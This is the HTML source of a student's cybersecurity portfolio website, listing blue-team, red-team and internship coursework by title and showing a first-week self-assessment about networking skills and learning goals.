          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
